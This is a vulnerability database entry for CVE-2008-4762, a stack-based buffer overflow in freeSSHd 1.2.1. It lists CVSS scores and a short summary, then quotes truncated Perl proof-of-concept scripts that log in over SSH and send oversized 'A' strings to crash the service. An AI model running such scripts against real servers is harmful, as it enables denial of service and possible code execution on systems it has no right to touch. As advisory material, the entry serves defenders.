CVE-2008-4762

Published: 28/10/2008 Updated: 11/10/2018
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 910
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in freeSSHd 1.2.1 allows remote authenticated users to cause a denial of service (service crash) and potentially execute arbitrary code via a long argument to the (1) rename and (2) realpath parameters.

Vulnerable Product

freesshd freesshd 1.2.1

Exploits

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmailcom/jbrownsecblogspotcom]
# FreeSSH 121 Crash -- A Product of Fuzzing Stay Tuned
use Net::SSH2;
$host = "1921680187";
$port = 22;
$username = "test";
$password = "test";
$dos = "A" x 550000;
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nE ...

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmailcom/jbrownsecblogspotcom]
# FreeSSH 121 Crash #2 -- A Product of Fuzzing Stay Tuned For More
use Net::SSH2;
$host = "1921680100";
$port = 22;
$username = "test";
$password = "test";
$dos = "A" x 262145;
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) ...